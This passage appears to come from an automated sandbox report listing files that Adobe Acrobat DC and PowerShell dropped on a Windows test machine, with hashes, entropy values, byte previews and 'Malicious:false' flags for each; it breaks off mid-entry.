                                                                              Encrypted:false
                                                                              SSDEEP:6:PIueS0pM+q2PcNwi2nKuAl9OmbzNMxIFUt82IueSJLXZmw+2IueStU2MVkwOcNw9:PE1pM+vLZHAa8jFUt82EyX/+2EWU2MVO
                                                                              MD5:7CA5FE1411C49AE242C071174114A5C2
                                                                              SHA1:F2B68E018ECC9EC1D615D72EAE4ABEE680A2FBBE
                                                                              SHA-256:7687F56BB690111A16B7CA865CAA8B3DA047A04ED7844172066CC5248BBD1D1D
                                                                              SHA-512:C42E01F77C041CE59B10B0BFA54C1CF4C748536ED87A432E6F9A75FFE093356307112F042676AA91EDD46B1957635FFB86BDE7B23F3CF0ADE1E9625F163BF8B2
                                                                              Malicious:false
                                                                              Preview:2024/09/30-09:37:17.461 1e8c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/09/30-09:37:17.463 1e8c Recovering log #3.2024/09/30-09:37:17.464 1e8c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 17
                                                                              Category:dropped
                                                                              Size (bytes):86016
                                                                              Entropy (8bit):4.438544547692221
                                                                              Encrypted:false
                                                                              SSDEEP:384:Seoci5GriBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:v7urVgazUpUTTGt
                                                                              MD5:BC560AC65B4BC284340B688EC5C02C93
                                                                              SHA1:DC30068F26515187F4A23775D2D11629EF00B375
                                                                              SHA-256:0CFA67F0652756348F512993A0C86B18E8AEC09228BFE121A9984B3D8C07DD2D
                                                                              SHA-512:12D127112D51F74389C61F468EE2832DBB50DF4BAB95607616604739E736E9BF987662653E27B611C6F71FC8A9C7DF2CEC82CDB174E6347163188FFE27890DBE
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite Rollback Journal
                                                                              Category:dropped
                                                                              Size (bytes):8720
                                                                              Entropy (8bit):2.214762402724224
                                                                              Encrypted:false
                                                                              SSDEEP:24:7+tM+L6wKJzqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9q:7MdWJzqvmFTIF3XmHjBoGGR+jMz+LhU
                                                                              MD5:9085E3C097138924C2AD866932EA0B9C
                                                                              SHA1:05FA787C48F8FF2186C74A0C39DE7297D5493C41
                                                                              SHA-256:197CEF8994DB079DD1C4DAF95D255999F75CBEF683735DC6DD0BC4121B3A3E60
                                                                              SHA-512:ED03F2E1786D6DBD6382E5D6EE5E3B521A1E4420C087E6B4360F1F0112878F8E8671BCBBCDB5BBDDA6D8B8148B388D4ACDA467DFF784713983F5AF25E9A01AB7
                                                                              Malicious:false
                                                                              Preview:.... .c.....!.M$........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:Certificate, Version=3
                                                                              Category:dropped
                                                                              Size (bytes):1391
                                                                              Entropy (8bit):7.705940075877404
                                                                              Encrypted:false
                                                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                              Malicious:false
                                                                              Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                              Category:dropped
                                                                              Size (bytes):71954
                                                                              Entropy (8bit):7.996617769952133
                                                                              Encrypted:true
                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                              Malicious:false
                                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):192
                                                                              Entropy (8bit):2.7464849065063066
                                                                              Encrypted:false
                                                                              SSDEEP:3:kkFklh9dVvfllXlE/HT8kgxtNNX8RolJuRdxLlGB9lQRYwpDdt:kKjT85NMa8RdWBwRd
                                                                              MD5:D4C38E4A601AE2EB9DFBBBB773CC8D47
                                                                              SHA1:4AA20A56A25842C6ADBC3A54E09300F2EFE3F9CF
                                                                              SHA-256:CAB7828B73A353A2FD670319BB69765D35AEB1CB71C63D941D0A5BB76F7CF9D9
                                                                              SHA-512:2680098BA82F4E4E283ABB2DC66B64A58729C8C98BAF4C87D0C409FDEBF62AFA0F49257B6A80D025FD35385FB2E10C2F6983110BF7C1C7C1D90AEA920A696B90
                                                                              Malicious:false
                                                                              Preview:p...... ............=...(....................................................... ..........W....nq..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):328
                                                                              Entropy (8bit):3.150184159866505
                                                                              Encrypted:false
                                                                              SSDEEP:6:kKlR9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:9ADnLNkPlE99SNxAhUe/3
                                                                              MD5:224C1AF1BC5720AFA7C0C8E39FEF6B90
                                                                              SHA1:D50ADCFCA2D202ACDD9FDBC6C635F7E85C5255C1
                                                                              SHA-256:0AAC87AA7A2F220CD891FE3DA9F61BF58537213FB262F60885F5CD251F0C5668
                                                                              SHA-512:E521007D785CB73BD4DEE1FA061A3C6120C5A58897F93856D0174A0869F130E8E41FC071FB71241AA5176F231A95951E1EE73127190097431A0DF0E00355579C
                                                                              Malicious:false
                                                                              Preview:p...... ............=...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7308

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:PostScript document text
                                                                              Category:dropped
                                                                              Size (bytes):185099
                                                                              Entropy (8bit):5.182478651346149
                                                                              Encrypted:false
                                                                              SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                              MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                              SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                              SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                              SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                              Malicious:false
                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:PostScript document text
                                                                              Category:dropped
                                                                              Size (bytes):185099
                                                                              Entropy (8bit):5.182478651346149
                                                                              Encrypted:false
                                                                              SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                              MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                              SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                              SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                              SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                              Malicious:false
                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4
                                                                              Entropy (8bit):0.8112781244591328
                                                                              Encrypted:false
                                                                              SSDEEP:3:e:e
                                                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                              Malicious:false
                                                                              Preview:....

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):1969
                                                                              Entropy (8bit):5.059812083454684
                                                                              Encrypted:false
                                                                              SSDEEP:24:YFuds9GvAAQvQd2vb/aBaMayGRExComnaEZ8U6akCcClxZZqiCiVaiIE0GFOG:YGvwvfb7ACHaECU6akn2ZqijwiIE0O
                                                                              MD5:15B727EA3C0C3E4FF45F008E86E5860C
                                                                              SHA1:73722F0893859A7EEB1008A348EE69B1A6955372
                                                                              SHA-256:170D91585C457A5A3E8D13C2BBC4EA90A6C99168DB563A174C74C1440ECFD5A4
                                                                              SHA-512:662660D045896349F3BA898CB019E13766F77118A14AE1EFB70F470A57C16D7BAF309275273E4579721981F7D1F349068E8B7E3B224A58A43050E386D0E42E45
                                                                              Malicious:false
                                                                              Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1727703437000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"5c23293c742ed52b97ce6913651e2bac","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696492429000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"1281d7dbf4238170aa87c435aca63c66","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696492423000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"824a4ec59c469b030f3b98175cf76e67","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696491691000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"9e3dce9d3ce52b8c98d60243d5cf7aa0","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696491691000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"27985839a1635c7b723b38c92bcfb75a","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1230,"ts":1696491691000},{"id":"DC_Reader_More_LHP_Banner","info":{

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                              Category:dropped
                                                                              Size (bytes):12288
                                                                              Entropy (8bit):1.4536498814161405
                                                                              Encrypted:false
                                                                              SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dso5lql:lNVmsw3SHtbDbPe0K3+fDZdNml
                                                                              MD5:537017098E1CA1C1D25337BD5FD1E9C7
                                                                              SHA1:784DDB0D4FD0FB451A25CF5B7DBAE8EE96C712D1
                                                                              SHA-256:F2257A0F02902DA4A1AB54F6C570B9AD56ADAB0D1432F1AA0897BCD815868007
                                                                              SHA-512:D765BC708724A9890A47C876398E3FCC258FD8A37C26744CDD0CB5B5B5F68A1EF45D1E0939EE678238EA60252D89D0B03E4024CCAB6A6F5A0905091C141F3DEC
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite Rollback Journal
                                                                              Category:dropped
                                                                              Size (bytes):8720
                                                                              Entropy (8bit):1.9592506249998727
                                                                              Encrypted:false
                                                                              SSDEEP:48:7M/rvrBd6dHtbGIbPe0K3+fDy2dsoM3qFl2GL7ms/:7a3SHtbDbPe0K3+fDZdNMKVms/
                                                                              MD5:686724AC676AA46AC92ED714E4DEF6FC
                                                                              SHA1:05F530723684F396E6718F882FE2E68E07147304
                                                                              SHA-256:A576A06D5D7701490B3AB251ADF81E852A3973393F8FD3118695BC5D8605E61D
                                                                              SHA-512:C8CD468FB6D05538237EA6329969D2A5E7E07B14B56BBF78E7F6586E37E7B73FA829156AF5618C91E8EC6B815C0F32744AA2D89E45CF2EFB6D6632647C58B9D8
                                                                              Malicious:false
                                                                              Preview:.... .c.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9434
                                                                              Entropy (8bit):4.928515784730612
                                                                              Encrypted:false
                                                                              SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                              MD5:D3594118838EF8580975DDA877E44DEB
                                                                              SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                              SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                              SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                              Malicious:false
                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):0.34726597513537405
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlll:Nll
                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                              Malicious:false
                                                                              Preview:@...e...........................................................

                                                                              C:\Users\user\AppData\Local\Temp\MSI37b66.LOG

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):246
                                                                              Entropy (8bit):3.5258803161342094
                                                                              Encrypted:false
                                                                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K87el:Qw946cPbiOxDlbYnuRKIq
                                                                              MD5:A9793EE081BFC16EEBEF13FBEAC2739F
                                                                              SHA1:C1FFF50BD03D3AEEC86DFD363CE4E3DDB98AE578
                                                                              SHA-256:AB3E1362D96143085E2DE9E6B8F7CDB1FC249D25A5DEE90EBF32F201F210A4AF
                                                                              SHA-512:D96C42144CA01187A1D46F0C8EDE7AE4A4B4779CB25A71A696C1B59D0AE522E0758A5AA2490BCE6367B97B83A4504859309E91544A4D87A4C7AFDF617AB75B3E
                                                                              Malicious:false
                                                                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .3.0./.0.9./.2.0.2.4. . .0.9.:.3.7.:.2.4. .=.=.=.....

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1snjrv25.tcg.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ipq0sg3.jzv.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lo0grxb.q5s.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bitvsf13.5sq.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxe3f4fh.cig.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
